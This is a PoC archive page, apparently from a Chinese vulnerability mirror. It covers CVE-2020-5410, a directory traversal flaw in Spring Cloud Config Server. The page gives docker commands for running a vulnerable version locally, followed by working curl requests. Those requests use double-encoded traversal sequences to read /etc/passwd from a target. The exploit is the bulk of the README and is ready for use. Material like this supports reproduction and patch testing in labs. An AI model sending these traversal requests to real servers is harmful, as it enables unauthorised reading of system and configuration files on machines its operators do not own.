关联漏洞
标题:VMware Spring Cloud Config 路径遍历漏洞 (CVE-2020-5410)Description:VMware Spring Cloud Config是美国威睿(VMware)公司的一套分布式系统的配置管理解决方案。该产品主要为分布式系统中的外部配置提供服务器和客户端支持。 VMware Spring Cloud Config 2.2.3之前的2.2.x版本、2.1.9之前的2.1.x版本和不再受支持的旧版本中的Spring-cloud-config-server模块存在路径遍历漏洞,该漏洞源于程序没有正确验证用户请求。攻击者可借助特制URL利用该漏洞查看系统上的任意文件。
Description
CVE-2020-5410 Spring Cloud Config directory traversal vulnerability
介绍
## CVE-2020-5410 Spring Cloud Config directory traversal vulnerability
#### Vulnerability description
Spring Cloud Config, version 2.2.x before 2.2.3, version 2.1.x before 2.1.9, and older unsupported versions allow applications to provide arbitrary configuration files through the spring-cloud-config-server module. Malicious users or attackers can use specially crafted URLs to send requests, which may lead to directory traversal attacks.
#### Analysis
https://xz.aliyun.com/t/7877
#### Vulnerable Docker Install
Install any of the vulnerable versions https://hub.docker.com/r/hyness/spring-cloud-config-server/tags
```
docker pull hyness/spring-cloud-config-server:2.1.6.RELEASE
```
```
docker run -it --name=spring-cloud-config-server \
-p 8888:8888 \
hyness/spring-cloud-config-server:2.1.6.RELEASE \
--spring.cloud.config.server.git.uri=https://github.com/spring-cloud-samples/config-repo
```
#### PoC
```
curl "vulnerablemachine:port/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
```
```
curl "127.0.0.1:8888/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development"
```
/etc/passwd content in response for educational purposes only :) .
文件快照
[4.0K] /data/pocs/0f86041dc99e1e240beda8e2996e80e0abeacb68
└── [1.3K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。